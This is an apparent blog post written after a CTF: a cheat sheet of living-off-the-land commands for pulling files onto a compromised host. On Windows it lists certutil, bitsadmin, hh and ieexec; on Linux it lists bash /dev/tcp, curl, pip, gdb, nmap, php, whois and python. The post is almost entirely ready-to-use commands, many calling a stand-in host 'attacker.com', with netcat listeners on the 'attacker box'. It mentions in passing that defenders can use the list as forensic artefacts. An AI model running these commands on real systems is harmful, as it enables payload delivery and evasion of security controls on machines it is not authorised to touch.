Background
While playing a CTF I had to copy files from one machine to the next. However I was not able to do so with a non standard binary. A few, weeks, months ago, really don't remember. I watched a talk where these 2 projects being presented. These project basicly showed a lot of research being done on system binaries that can be used during Red-Team activities. Ofcourse these can also be added to your forensic artefact list should you be interested in preventing them from being used.
Windows
Linux
From these websites I found multiple other binaries that could do remote file copy and so much more. I highly recommend looking them up. To make it easier for myself and maybe you? next time we might need them I copied some of command in this post for easy access. (All credits go to the researchers of those 2 great projects)
Windows
bitsadmin
bitsadmin /create 1 bitsadmin /addfile 1 <url>/file.ext> <output Folder>\file.ext bitsadmin /RESUME 1 bitsadmin /complete 1
certutil
certutil.exe -urlcache -split -f <url>/file.ext <outputFile.ext>
Esentutl
esentutl.exe /y \\<url without www>\<file.ext> /d \\otherwebdavserver\webdav\adrestore.exe /o
Expand
expand \\webdav\folder\file.bat c:\ADS\file.bat
Extrac32
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Findstr
findstr /V /L mip9-2rnuar;gl934gmlkj \\webdavserver\folder\file.exe > c:\ADS\file.exe
Hh
HH.exe http://some.url/script.ps1
Ieexec
ieexec.exe http://x.x.x.x:8080/bypass.exe
Makecab
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Replace
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Linux
Bash
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
Remote file using a TCP connection. Run nc -l -p 12345 < "file_to_send" on the attacker box
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
CPAN
export URL=http://attacker.com/file_to_get
cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
curl
URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILE
easy_install
export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo "import os;
os.execl('$(whereis python)', '$(whereis python)', '-c', \"\"\"import sys;
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve('$URL', '$LFILE')\"\"\")" > $TF/setup.py
pip install $TF
GDB
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
gdb -nx -ex 'python import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])' -ex quit
NMAP
Run nc target.com 12345 < "file_to_send" on the attacker
export LPORT=12345
export LFILE=file_to_save
TF=$(mktemp)
echo 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);' > $TF
nmap --script=$TF
php
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
whois
Run nc -l -p 12345 < "file_to_send" on the attacker box
The file has instances of $'\x0d' stripped.
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT > "$LFILE"
Run base64 "file_to_send" | nc -l -p 12345 on the attacker box
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
Python
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])'